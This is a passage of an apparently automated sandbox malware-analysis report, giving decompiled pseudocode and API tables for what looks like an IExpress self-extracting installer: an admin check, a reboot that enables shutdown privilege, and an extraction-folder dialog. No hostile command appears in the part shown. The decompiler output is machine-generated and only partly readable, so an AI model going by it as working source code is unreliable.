                              						while(EqualSid( *_t50, _v32) == 0) {
                              							_t45 = _t45 + 1;
                              							_t50 = _t50 + 8;
                              							if(_t45 <  *_t52) {
                              								continue;
                              							}
                              							goto L14;
                              						}
                              						 *0x10e8128 = 1;
                              						_v20 = 1;
                              						goto L14;
                              					}
                              				}
                              			}


















                              0x010e18a3
                              0x010e18a3
                              0x010e18ab
                              0x010e18b2
                              0x010e18b5
                              0x010e18be
                              0x010e18c0
                              0x010e18c6
                              0x010e18c7
                              0x010e18ca
                              0x010e18cf
                              0x010e19c9
                              0x010e19d8
                              0x010e19d8
                              0x010e18df
                              0x010e19b8
                              0x010e19bd
                              0x010e19bf
                              0x010e19bf
                              0x00000000
                              0x010e19bd
                              0x010e18fa
                              0x00000000
                              0x00000000
                              0x010e1912
                              0x010e19aa
                              0x010e19ad
                              0x010e19b3
                              0x00000000
                              0x010e1927
                              0x010e1927
                              0x010e1932
                              0x010e1936
                              0x010e19a9
                              0x010e19a9
                              0x00000000
                              0x010e19a9
                              0x010e194c
                              0x010e19a2
                              0x010e19a3
                              0x00000000
                              0x010e196e
                              0x010e1970
                              0x010e1999
                              0x010e199c
                              0x00000000
                              0x010e199c
                              0x010e1972
                              0x010e1972
                              0x010e1975
                              0x010e1984
                              0x010e1985
                              0x010e198a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e198c
                              0x010e1991
                              0x010e1996
                              0x00000000
                              0x010e1996
                              0x010e194c

                              APIs
                                • Part of subcall function 010E17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010E18DD), ref: 010E181A
                                • Part of subcall function 010E17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010E182C
                                • Part of subcall function 010E17EE: AllocateAndInitializeSid.ADVAPI32(010E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010E18DD), ref: 010E1855
                                • Part of subcall function 010E17EE: FreeSid.ADVAPI32(?,?,?,?,010E18DD), ref: 010E1883
                                • Part of subcall function 010E17EE: FreeLibrary.KERNEL32(00000000,?,?,?,010E18DD), ref: 010E188A
                              • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 010E18EB
                              • OpenProcessToken.ADVAPI32(00000000), ref: 010E18F2
                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 010E190A
                              • GetLastError.KERNEL32 ref: 010E1918
                              • LocalAlloc.KERNEL32(00000000,?,?), ref: 010E192C
                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 010E1944
                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 010E1964
                              • EqualSid.ADVAPI32(00000004,?), ref: 010E197A
                              • FreeSid.ADVAPI32(?), ref: 010E199C
                              • LocalFree.KERNEL32(00000000), ref: 010E19A3
                              • CloseHandle.KERNEL32(?), ref: 010E19AD
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                              • String ID:
                              • API String ID: 2168512254-0
                              • Opcode ID: 80e2d97bf3786ef9420e872bd25f17e0daf74f81925c8ef8adf1ad34b0fcf30c
                              • Instruction ID: 18180af1d8adf701d10543581c6c9c8e96629bb7e2e6510eb08b9fc8d0bd5f48
                              • Opcode Fuzzy Hash: 80e2d97bf3786ef9420e872bd25f17e0daf74f81925c8ef8adf1ad34b0fcf30c
                              • Instruction Fuzzy Hash: 64312A71A00209EFDB609FA6DC88AAFBFFCFF48B50B104469F685E6154D73699048B61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 60%
                              			E010E1F90(signed int __ecx, void* __edi, void* __esi) {
                              				signed int _v8;
                              				int _v12;
                              				struct _TOKEN_PRIVILEGES _v24;
                              				void* _v28;
                              				void* __ebx;
                              				signed int _t13;
                              				int _t21;
                              				void* _t25;
                              				int _t28;
                              				signed char _t30;
                              				void* _t38;
                              				void* _t40;
                              				void* _t41;
                              				signed int _t46;
                              
                              				_t41 = __esi;
                              				_t38 = __edi;
                              				_t30 = __ecx;
                              				if((__ecx & 0x00000002) != 0) {
                              					L12:
                              					if((_t30 & 0x00000004) != 0) {
                              						L14:
                              						if( *0x10e9a40 != 0) {
                              							_pop(_t30);
                              							_t44 = _t46;
                              							_t13 =  *0x10e8004; // 0x9fdbf5b5
                              							_v8 = _t13 ^ _t46;
                              							_push(_t38);
                              							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                              								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                              								_v24.PrivilegeCount = 1;
                              								_v12 = 2;
                              								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                              								CloseHandle(_v28);
                              								_t41 = _t41;
                              								_push(0);
                              								if(_t21 != 0) {
                              									if(ExitWindowsEx(2, ??) != 0) {
                              										_t25 = 1;
                              									} else {
                              										_t37 = 0x4f7;
                              										goto L3;
                              									}
                              								} else {
                              									_t37 = 0x4f6;
                              									goto L4;
                              								}
                              							} else {
                              								_t37 = 0x4f5;
                              								L3:
                              								_push(0);
                              								L4:
                              								_push(0x10);
                              								_push(0);
                              								_push(0);
                              								E010E44B9(0, _t37);
                              								_t25 = 0;
                              							}
                              							_pop(_t40);
                              							return E010E6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                              						} else {
                              							_t28 = ExitWindowsEx(2, 0);
                              							goto L16;
                              						}
                              					} else {
                              						_t37 = 0x522;
                              						_t28 = E010E44B9(0, 0x522, 0x10e1140, 0, 0x40, 4);
                              						if(_t28 != 6) {
                              							goto L16;
                              						} else {
                              							goto L14;
                              						}
                              					}
                              				} else {
                              					__eax = E010E1EA7(__ecx);
                              					if(__eax != 2) {
                              						L16:
                              						return _t28;
                              					} else {
                              						goto L12;
                              					}
                              				}
                              			}

















                              0x010e1f90
                              0x010e1f90
                              0x010e1f93
                              0x010e1f98
                              0x010e1fa4
                              0x010e1fa7
                              0x010e1fc5
                              0x010e1fcd
                              0x010e1fdb
                              0x010e1ee5
                              0x010e1eea
                              0x010e1ef1
                              0x010e1ef4
                              0x010e1f0c
                              0x010e1f2e
                              0x010e1f3a
                              0x010e1f46
                              0x010e1f4d
                              0x010e1f58
                              0x010e1f60
                              0x010e1f61
                              0x010e1f62
                              0x010e1f75
                              0x010e1f80
                              0x010e1f77
                              0x010e1f77
                              0x00000000
                              0x010e1f77
                              0x010e1f64
                              0x010e1f64
                              0x00000000
                              0x010e1f64
                              0x010e1f0e
                              0x010e1f0e
                              0x010e1f13
                              0x010e1f13
                              0x010e1f14
                              0x010e1f14
                              0x010e1f16
                              0x010e1f17
                              0x010e1f1a
                              0x010e1f1f
                              0x010e1f1f
                              0x010e1f86
                              0x010e1f8f
                              0x010e1fcf
                              0x010e1fd3
                              0x00000000
                              0x010e1fd3
                              0x010e1fa9
                              0x010e1fb4
                              0x010e1fbb
                              0x010e1fc3
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e1fc3
                              0x010e1f9a
                              0x010e1f9a
                              0x010e1fa2
                              0x010e1fd9
                              0x010e1fda
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e1fa2

                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 010E1EFB
                              • OpenProcessToken.ADVAPI32(00000000), ref: 010E1F02
                              • ExitWindowsEx.USER32(00000002,00000000), ref: 010E1FD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Process$CurrentExitOpenTokenWindows
                              • String ID: SeShutdownPrivilege
                              • API String ID: 2795981589-3733053543
                              • Opcode ID: 9d9aa912a8c6d53c284000c2961bcedb2787d103bde2a9ed8146bc52327a2729
                              • Instruction ID: f1085c14d9b5bb200b842003d64a3963fad5068585b62586bb81ad08b2ea23ca
                              • Opcode Fuzzy Hash: 9d9aa912a8c6d53c284000c2961bcedb2787d103bde2a9ed8146bc52327a2729
                              • Instruction Fuzzy Hash: 1021D6B1B40205AEDB305AA79C4DFBF7AF8EB99B51F100059FA82DA185D779C80183A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E7155() {
                              				void* _v8;
                              				struct _FILETIME _v16;
                              				signed int _v20;
                              				union _LARGE_INTEGER _v24;
                              				signed int _t23;
                              				signed int _t36;
                              				signed int _t37;
                              				signed int _t39;
                              
                              				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                              				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                              				_t23 =  *0x10e8004; // 0x9fdbf5b5
                              				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                              					GetSystemTimeAsFileTime( &_v16);
                              					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                              					_v8 = _v8 ^ GetCurrentProcessId();
                              					_v8 = _v8 ^ GetCurrentThreadId();
                              					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                              					QueryPerformanceCounter( &_v24);
                              					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                              					_t39 = _t36;
                              					if(_t36 == 0xbb40e64e || ( *0x10e8004 & 0xffff0000) == 0) {
                              						_t36 = 0xbb40e64f;
                              						_t39 = 0xbb40e64f;
                              					}
                              					 *0x10e8004 = _t39;
                              				}
                              				_t37 =  !_t36;
                              				"J\n$`System\\CurrentControlSet\\Control\\Session Manager" = _t37;
                              				return _t37;
                              			}











                              0x010e715d
                              0x010e7161
                              0x010e7165
                              0x010e7178
                              0x010e7182
                              0x010e718e
                              0x010e7197
                              0x010e71a0
                              0x010e71b1
                              0x010e71b8
                              0x010e71c4
                              0x010e71c7
                              0x010e71cb
                              0x010e71d5
                              0x010e71da
                              0x010e71da
                              0x010e71dc
                              0x010e71dc
                              0x010e71e2
                              0x010e71e5
                              0x010e71ee

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010E7182
                              • GetCurrentProcessId.KERNEL32 ref: 010E7191
                              • GetCurrentThreadId.KERNEL32 ref: 010E719A
                              • GetTickCount.KERNEL32 ref: 010E71A3
                              • QueryPerformanceCounter.KERNEL32(?), ref: 010E71B8
                              Strings
                              • J$`System\CurrentControlSet\Control\Session Manager, xrefs: 010E71E5
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                              • String ID: J$`System\CurrentControlSet\Control\Session Manager
                              • API String ID: 1445889803-1491229363
                              • Opcode ID: 59dfc0629528aaa5e850fa9ab406f4c0ed401beb6ab5f5d5bb49d15789566b91
                              • Instruction ID: 4b8449008859c847cf3a163ef4e382dfca948fc55b83a7d7be811277e8f9b286
                              • Opcode Fuzzy Hash: 59dfc0629528aaa5e850fa9ab406f4c0ed401beb6ab5f5d5bb49d15789566b91
                              • Instruction Fuzzy Hash: E2111C71E01208DFCB60DFBAD648A9EBBF5EF48755F614896E945EB204E639DA008B40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E6CF0(struct _EXCEPTION_POINTERS* _a4) {
                              
                              				SetUnhandledExceptionFilter(0);
                              				UnhandledExceptionFilter(_a4);
                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                              			}



                              0x010e6cf7
                              0x010e6d00
                              0x010e6d19

                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,010E6E26,010E1000), ref: 010E6CF7
                              • UnhandledExceptionFilter.KERNEL32(010E6E26,?,010E6E26,010E1000), ref: 010E6D00
                              • GetCurrentProcess.KERNEL32(C0000409,?,010E6E26,010E1000), ref: 010E6D0B
                              • TerminateProcess.KERNEL32(00000000,?,010E6E26,010E1000), ref: 010E6D12
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                              • String ID:
                              • API String ID: 3231755760-0
                              • Opcode ID: 4256383c90560ef298ee571f180b28767e999ef690b8cbd7222af590c038e8df
                              • Instruction ID: 134a8639d65a58b90c3bf0469e1580467ebce5c6cc1869e1ed42b328be7a0bd5
                              • Opcode Fuzzy Hash: 4256383c90560ef298ee571f180b28767e999ef690b8cbd7222af590c038e8df
                              • Instruction Fuzzy Hash: 94D0C932200108FBDB202BE2E80CA593FA8EB8DA92F454085F3598B004CA3BC4518B51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 76%
                              			E010E3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                              				void* __edi;
                              				void* _t6;
                              				void* _t10;
                              				int _t20;
                              				int _t21;
                              				int _t23;
                              				char _t24;
                              				long _t25;
                              				int _t27;
                              				int _t30;
                              				void* _t32;
                              				int _t33;
                              				int _t34;
                              				int _t37;
                              				int _t38;
                              				int _t39;
                              				void* _t42;
                              				void* _t46;
                              				CHAR* _t49;
                              				void* _t58;
                              				void* _t63;
                              				struct HWND__* _t64;
                              
                              				_t64 = _a4;
                              				_t6 = _a8 - 0x10;
                              				if(_t6 == 0) {
                              					_push(0);
                              					L38:
                              					EndDialog(_t64, ??);
                              					L39:
                              					__eflags = 1;
                              					return 1;
                              				}
                              				_t42 = 1;
                              				_t10 = _t6 - 0x100;
                              				if(_t10 == 0) {
                              					E010E43D0(_t64, GetDesktopWindow());
                              					SetWindowTextA(_t64, "lenta");
                              					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                              					__eflags =  *0x10e9a40 - _t42; // 0x3
                              					if(__eflags == 0) {
                              						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                              					}
                              					L36:
                              					return _t42;
                              				}
                              				if(_t10 == _t42) {
                              					_t20 = _a12 - 1;
                              					__eflags = _t20;
                              					if(_t20 == 0) {
                              						_t21 = GetDlgItemTextA(_t64, 0x835, 0x10e91e4, 0x104);
                              						__eflags = _t21;
                              						if(_t21 == 0) {
                              							L32:
                              							_t58 = 0x4bf;
                              							_push(0);
                              							_push(0x10);
                              							_push(0);
                              							_push(0);
                              							L25:
                              							E010E44B9(_t64, _t58);
                              							goto L39;
                              						}
                              						_t49 = 0x10e91e4;
                              						do {
                              							_t23 =  *_t49;
                              							_t49 =  &(_t49[1]);
                              							__eflags = _t23;
                              						} while (_t23 != 0);
                              						__eflags = _t49 - 0x10e91e5 - 3;
                              						if(_t49 - 0x10e91e5 < 3) {
                              							goto L32;
                              						}
                              						_t24 =  *0x10e91e5; // 0x3a
                              						__eflags = _t24 - 0x3a;
                              						if(_t24 == 0x3a) {
                              							L21:
                              							_t25 = GetFileAttributesA(0x10e91e4);
                              							__eflags = _t25 - 0xffffffff;
                              							if(_t25 != 0xffffffff) {
                              								L26:
                              								E010E658A(0x10e91e4, 0x104, 0x10e1140);
                              								_t27 = E010E58C8(0x10e91e4);
                              								__eflags = _t27;
                              								if(_t27 != 0) {
                              									__eflags =  *0x10e91e4 - 0x5c;
                              									if( *0x10e91e4 != 0x5c) {
                              										L30:
                              										_t30 = E010E597D(0x10e91e4, 1, _t64, 1);
                              										__eflags = _t30;
                              										if(_t30 == 0) {
                              											L35:
                              											_t42 = 1;
                              											__eflags = 1;
                              											goto L36;
                              										}
                              										L31:
                              										_t42 = 1;
                              										EndDialog(_t64, 1);
                              										goto L36;
                              									}
                              									__eflags =  *0x10e91e5 - 0x5c;
                              									if( *0x10e91e5 == 0x5c) {
                              										goto L31;
                              									}
                              									goto L30;
                              								}
                              								_push(0);
                              								_push(0x10);
                              								_push(0);
                              								_push(0);
                              								_t58 = 0x4be;
                              								goto L25;
                              							}
                              							_t32 = E010E44B9(_t64, 0x54a, 0x10e91e4, 0, 0x20, 4);
                              							__eflags = _t32 - 6;
                              							if(_t32 != 6) {
                              								goto L35;
                              							}
                              							_t33 = CreateDirectoryA(0x10e91e4, 0);
                              							__eflags = _t33;
                              							if(_t33 != 0) {
                              								goto L26;
                              							}
                              							_push(0);
                              							_push(0x10);
                              							_push(0);
                              							_push(0x10e91e4);
                              							_t58 = 0x4cb;
                              							goto L25;
                              						}
                              						__eflags =  *0x10e91e4 - 0x5c;
                              						if( *0x10e91e4 != 0x5c) {
                              							goto L32;
                              						}
                              						__eflags = _t24 - 0x5c;
                              						if(_t24 != 0x5c) {
                              							goto L32;
                              						}
                              						goto L21;
                              					}
                              					_t34 = _t20 - 1;
                              					__eflags = _t34;
                              					if(_t34 == 0) {
                              						EndDialog(_t64, 0);
                              						 *0x10e9124 = 0x800704c7;
                              						goto L39;
                              					}
                              					__eflags = _t34 != 0x834;
                              					if(_t34 != 0x834) {
                              						goto L36;
                              					}
                              					_t37 = LoadStringA( *0x10e9a3c, 0x3e8, 0x10e8598, 0x200);
                              					__eflags = _t37;
                              					if(_t37 != 0) {
                              						_t38 = E010E4224(_t64, _t46, _t46);
                              						__eflags = _t38;
                              						if(_t38 == 0) {
                              							goto L36;
                              						}
                              						_t39 = SetDlgItemTextA(_t64, 0x835, 0x10e87a0);
                              						__eflags = _t39;
                              						if(_t39 != 0) {
                              							goto L36;
                              						}
                              						_t63 = 0x4c0;
                              						L9:
                              						E010E44B9(_t64, _t63, 0, 0, 0x10, 0);
                              						_push(0);
                              						goto L38;
                              					}
                              					_t63 = 0x4b1;
                              					goto L9;
                              				}
                              				return 0;
                              			}

























                              0x010e321b
                              0x010e321e
                              0x010e3221
                              0x010e343c
                              0x010e343e
                              0x010e343f
                              0x010e3445
                              0x010e3447
                              0x00000000
                              0x010e3447
                              0x010e3229
                              0x010e322a
                              0x010e322f
                              0x010e33ec
                              0x010e33f7
                              0x010e3410
                              0x010e3416
                              0x010e341d
                              0x010e342d
                              0x010e342d
                              0x010e3438
                              0x00000000
                              0x010e3438
                              0x010e3237
                              0x010e3243
                              0x010e3243
                              0x010e3246
                              0x010e32ee
                              0x010e32f4
                              0x010e32f6
                              0x010e33d4
                              0x010e33d6
                              0x010e33db
                              0x010e33dc
                              0x010e33de
                              0x010e33df
                              0x010e3370
                              0x010e3372
                              0x00000000
                              0x010e3372
                              0x010e32fc
                              0x010e3301
                              0x010e3301
                              0x010e3303
                              0x010e3304
                              0x010e3304
                              0x010e330a
                              0x010e330d
                              0x00000000
                              0x00000000
                              0x010e3313
                              0x010e3318
                              0x010e331a
                              0x010e3331
                              0x010e3332
                              0x010e333a
                              0x010e333d
                              0x010e337c
                              0x010e3388
                              0x010e338f
                              0x010e3394
                              0x010e3396
                              0x010e33a4
                              0x010e33ab
                              0x010e33b6
                              0x010e33be
                              0x010e33c3
                              0x010e33c5
                              0x010e3435
                              0x010e3437
                              0x010e3437
                              0x00000000
                              0x010e3437
                              0x010e33c7
                              0x010e33c9
                              0x010e33cc
                              0x00000000
                              0x010e33cc
                              0x010e33ad
                              0x010e33b4
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e33b4
                              0x010e3398
                              0x010e3399
                              0x010e339b
                              0x010e339c
                              0x010e339d
                              0x00000000
                              0x010e339d
                              0x010e334c
                              0x010e3351
                              0x010e3354
                              0x00000000
                              0x00000000
                              0x010e335c
                              0x010e3362
                              0x010e3364
                              0x00000000
                              0x00000000
                              0x010e3366
                              0x010e3367
                              0x010e3369
                              0x010e336a
                              0x010e336b
                              0x00000000
                              0x010e336b
                              0x010e331c
                              0x010e3323
                              0x00000000
                              0x00000000
                              0x010e3329
                              0x010e332b
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e332b
                              0x010e324c
                              0x010e324c
                              0x010e324f
                              0x010e32c8
                              0x010e32ce
                              0x00000000
                              0x010e32ce
                              0x010e3251
                              0x010e3256
                              0x00000000
                              0x00000000
                              0x010e3271
                              0x010e3277
                              0x010e3279
                              0x010e3298
                              0x010e329d
                              0x010e329f
                              0x00000000
                              0x00000000
                              0x010e32b0
                              0x010e32b6
                              0x010e32b8
                              0x00000000
                              0x00000000
                              0x010e32be
                              0x010e3280
                              0x010e3289
                              0x010e328e
                              0x00000000
                              0x010e328e
                              0x010e327b
                              0x00000000
                              0x010e327b
                              0x00000000

                              APIs
                              • LoadStringA.USER32(000003E8,010E8598,00000200), ref: 010E3271
                              • GetDesktopWindow.USER32 ref: 010E33E2
                              • SetWindowTextA.USER32(?,lenta), ref: 010E33F7
                              • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 010E3410
                              • GetDlgItem.USER32(?,00000836), ref: 010E3426
                              • EnableWindow.USER32(00000000), ref: 010E342D
                              • EndDialog.USER32(?,00000000), ref: 010E343F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$lenta
                              • API String ID: 2418873061-2614117474
                              • Opcode ID: 145b4d2bdf9ffb034c02ce211f3fddbffdfc3fd4da29a022d9a17e58b1c0d5f1
                              • Instruction ID: 1fa387ff40097ebe925d4292f55383f98a591a15c6cc6a97118c38790048bd7e
                              • Opcode Fuzzy Hash: 145b4d2bdf9ffb034c02ce211f3fddbffdfc3fd4da29a022d9a17e58b1c0d5f1
                              • Instruction Fuzzy Hash: C951B370341240AEE7725A3B5C4CFBF6DD9BB89B54F4080A9F6C59F2C5CEA9D8019361
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E010E2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                              				signed int _v8;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t13;
                              				void* _t20;
                              				void* _t23;
                              				void* _t27;
                              				struct HRSRC__* _t31;
                              				intOrPtr _t33;
                              				void* _t43;
                              				void* _t48;
                              				signed int _t65;
                              				struct HINSTANCE__* _t66;
                              				signed int _t67;
                              
                              				_t13 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t13 ^ _t67;
                              				_t65 = 0;
                              				_t66 = __ecx;
                              				_t48 = __edx;
                              				 *0x10e9a3c = __ecx;
                              				memset(0x10e9140, 0, 0x8fc);
                              				memset(0x10e8a20, 0, 0x32c);
                              				memset(0x10e88c0, 0, 0x104);
                              				 *0x10e93ec = 1;
                              				_t20 = E010E468F("TITLE", 0x10e9154, 0x7f);
                              				if(_t20 == 0 || _t20 > 0x80) {
                              					_t64 = 0x4b1;
                              					goto L32;
                              				} else {
                              					_t27 = CreateEventA(0, 1, 1, 0);
                              					 *0x10e858c = _t27;
                              					SetEvent(_t27);
                              					_t64 = 0x10e9a34;
                              					if(E010E468F("EXTRACTOPT", 0x10e9a34, 4) != 0) {
                              						if(( *0x10e9a34 & 0x000000c0) == 0) {
                              							L12:
                              							 *0x10e9120 =  *0x10e9120 & _t65;
                              							if(E010E5C9E(_t48, _t48, _t65, _t66) != 0) {
                              								if( *0x10e8a3a == 0) {
                              									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                              									if(_t31 != 0) {
                              										_t65 = LoadResource(_t66, _t31);
                              									}
                              									if( *0x10e8184 != 0) {
                              										__imp__#17();
                              									}
                              									if( *0x10e8a24 == 0) {
                              										_t57 = _t65;
                              										if(E010E36EE(_t65) == 0) {
                              											goto L33;
                              										} else {
                              											_t33 =  *0x10e9a40; // 0x3
                              											_t48 = 1;
                              											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                              												if(( *0x10e9a34 & 0x00000100) == 0 || ( *0x10e8a38 & 0x00000001) != 0 || E010E18A3(_t64, _t66) != 0) {
                              													goto L30;
                              												} else {
                              													_t64 = 0x7d6;
                              													if(E010E6517(_t57, 0x7d6, _t34, E010E19E0, 0x547, 0x83e) != 0x83d) {
                              														goto L33;
                              													} else {
                              														goto L30;
                              													}
                              												}
                              											} else {
                              												L30:
                              												_t23 = _t48;
                              											}
                              										}
                              									} else {
                              										_t23 = 1;
                              									}
                              								} else {
                              									E010E2390(0x10e8a3a);
                              									goto L33;
                              								}
                              							} else {
                              								_t64 = 0x520;
                              								L32:
                              								E010E44B9(0, _t64, 0, 0, 0x10, 0);
                              								goto L33;
                              							}
                              						} else {
                              							_t64 =  &_v268;
                              							if(E010E468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                              								goto L3;
                              							} else {
                              								_t43 = CreateMutexA(0, 1,  &_v268);
                              								 *0x10e8588 = _t43;
                              								if(_t43 == 0 || GetLastError() != 0xb7) {
                              									goto L12;
                              								} else {
                              									if(( *0x10e9a34 & 0x00000080) == 0) {
                              										_t64 = 0x524;
                              										if(E010E44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                              											goto L12;
                              										} else {
                              											goto L11;
                              										}
                              									} else {
                              										_t64 = 0x54b;
                              										E010E44B9(0, 0x54b, "lenta", 0, 0x10, 0);
                              										L11:
                              										CloseHandle( *0x10e8588);
                              										 *0x10e9124 = 0x800700b7;
                              										goto L33;
                              									}
                              								}
                              							}
                              						}
                              					} else {
                              						L3:
                              						_t64 = 0x4b1;
                              						E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                              						 *0x10e9124 = 0x80070714;
                              						L33:
                              						_t23 = 0;
                              					}
                              				}
                              				return E010E6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                              			}



















                              0x010e2cb5
                              0x010e2cbc
                              0x010e2cc7
                              0x010e2cc9
                              0x010e2cd1
                              0x010e2cd3
                              0x010e2cd9
                              0x010e2ce9
                              0x010e2cf9
                              0x010e2d0e
                              0x010e2d15
                              0x010e2d1c
                              0x010e2ef3
                              0x00000000
                              0x010e2d2d
                              0x010e2d34
                              0x010e2d3b
                              0x010e2d40
                              0x010e2d48
                              0x010e2d59
                              0x010e2d84
                              0x010e2e1f
                              0x010e2e1f
                              0x010e2e2e
                              0x010e2e41
                              0x010e2e5a
                              0x010e2e62
                              0x010e2e6c
                              0x010e2e6c
                              0x010e2e75
                              0x010e2e77
                              0x010e2e77
                              0x010e2e84
                              0x010e2e8b
                              0x010e2e94
                              0x00000000
                              0x010e2e96
                              0x010e2e96
                              0x010e2e9e
                              0x010e2ea2
                              0x010e2eba
                              0x00000000
                              0x010e2ece
                              0x010e2ede
                              0x010e2eed
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e2eed
                              0x010e2eef
                              0x010e2eef
                              0x010e2eef
                              0x010e2eef
                              0x010e2ea2
                              0x010e2e86
                              0x010e2e88
                              0x010e2e88
                              0x010e2e43
                              0x010e2e48
                              0x00000000
                              0x010e2e48
                              0x010e2e30
